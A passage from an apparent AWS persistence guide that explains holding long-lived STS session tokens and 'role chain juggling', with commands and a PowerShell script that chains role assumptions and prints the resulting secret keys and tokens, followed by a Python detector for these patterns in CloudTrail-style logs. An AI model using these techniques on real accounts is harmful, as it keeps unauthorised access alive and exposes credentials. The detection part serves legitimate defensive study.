Temporary tokens cannot be listed, so keeping an active temporary token alive is one way to maintain persistence.

```bash
aws sts get-session-token --duration-seconds 129600

# With MFA
aws sts get-session-token \
    --serial-number <mfa-device-name> \
    --token-code <code-from-token>

# Hardware device name is usually the number from the back of the device, such as GAHT12345678
# SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
# Virtual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
```
Role Chain Juggling

Role chaining is a recognised AWS feature, often used to maintain stealthy persistence. It involves the ability to assume a role that then assumes another, possibly returning to the initial role in a cyclic manner. Each time a role is assumed, the expiration field of the credentials is refreshed. Consequently, if two roles are configured to assume each other mutually, this setup allows for continuous renewal of credentials.

You can use this tool to keep the role chain going:

Code to perform Role Juggling from PowerShell
```powershell
# PowerShell script to check for role juggling possibilities using AWS CLI

# Check for AWS CLI installation
if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) {
    Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
    exit
}

# Function to list IAM roles
function List-IAMRoles {
    aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
}

# Initialize error count
$errorCount = 0

# List all roles
$roles = List-IAMRoles | ConvertFrom-Json

# Attempt to assume each role
foreach ($role in $roles) {
    $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
    try {
        $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json

        if ($credentials) {
            Write-Host "Successfully assumed role: $($role.RoleName)"
            Write-Host "Access Key: $($credentials.AccessKeyId)"
            Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
            Write-Host "Session Token: $($credentials.SessionToken)"
            Write-Host "Expiration: $($credentials.Expiration)"

            # Set temporary credentials to assume the next role
            $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
            $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
            $env:AWS_SESSION_TOKEN = $credentials.SessionToken

            # Try to assume another role using the temporary credentials
            foreach ($nextRole in $roles) {
                if ($nextRole.Arn -ne $role.Arn) {
                    $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
                    try {
                        $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json

                        if ($nextCredentials) {
                            Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
                            Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
                            Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
                            Write-Host "Session Token: $($nextCredentials.SessionToken)"
                            Write-Host "Expiration: $($nextCredentials.Expiration)"
                        }
                    } catch {
                        $errorCount++
                    }
                }
            }

            # Reset environment variables
            Remove-Item Env:\AWS_ACCESS_KEY_ID
            Remove-Item Env:\AWS_SECRET_ACCESS_KEY
            Remove-Item Env:\AWS_SESSION_TOKEN
        } else {
            $errorCount++
        }
    } catch {
        $errorCount++
    }
}

# Output the number of errors if any
if ($errorCount -gt 0) {
    Write-Host "$errorCount error(s) occurred during role assumption attempts."
} else {
    Write-Host "No errors occurred. All roles checked successfully."
}

Write-Host "Role juggling check complete."
```
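As an added defensive counterpart to both techniques above (example code, not part of the original page), the following Python check runs over constructed CloudTrail-style records and flags GetSessionToken calls with an unusually long requested lifetime, plus AssumeRole calls issued from an already-assumed role session that form a cycle, which is exactly the trace a role-juggling loop leaves. The userIdentity/requestParameters field layout follows CloudTrail; the 12-hour threshold, account id and role names are assumptions.

```python
import re
from collections import defaultdict
# Constructed CloudTrail-style records (not real logs): one long-lived
# GetSessionToken and an AssumeRole chain that loops RoleA -> RoleB -> RoleA.
EVENTS = [
    {"eventName": "GetSessionToken",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"},
     "requestParameters": {"durationSeconds": 129600}},
    {"eventName": "AssumeRole",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/RoleA"}},
    {"eventName": "AssumeRole",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::123456789012:assumed-role/RoleA/RoleJugglingTest-1"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/RoleB"}},
    {"eventName": "AssumeRole",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::123456789012:assumed-role/RoleB/RoleJugglingTest-2"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/RoleA"}},
]

SESSION_RE = re.compile(r":assumed-role/([^/]+)/")   # role name inside an STS session ARN
ROLE_RE = re.compile(r":role/([^/]+)$")              # role name inside an IAM role ARN

def long_session_tokens(events, max_seconds=43200):
    """Callers of GetSessionToken that asked for a lifetime above max_seconds (12h is an assumed threshold)."""
    return [(e["userIdentity"]["arn"], e["requestParameters"]["durationSeconds"])
            for e in events if e["eventName"] == "GetSessionToken"
            and (e.get("requestParameters") or {}).get("durationSeconds", 0) > max_seconds]
def chained_assumptions(events):
    """Edges source_role -> target_role for AssumeRole calls issued from an assumed-role session."""
    edges = defaultdict(set)
    for e in events:
        if e["eventName"] != "AssumeRole" or e["userIdentity"]["type"] != "AssumedRole":
            continue
        src = SESSION_RE.search(e["userIdentity"]["arn"])
        dst = ROLE_RE.search(e["requestParameters"]["roleArn"])
        if src and dst:
            edges[src.group(1)].add(dst.group(1))
    return edges

def role_cycles(edges):
    """Role pairs that assume each other: the mutual trust a juggling loop depends on."""
    return sorted({tuple(sorted((a, b))) for a, targets in edges.items()
                   for b in targets if a in edges.get(b, ())})

if __name__ == "__main__":
    print(long_session_tokens(EVENTS), role_cycles(chained_assumptions(EVENTS)))
```

Run against real CloudTrail exports by replacing EVENTS with the parsed `Records` array; any pair reported by role_cycles is a trust policy worth reviewing.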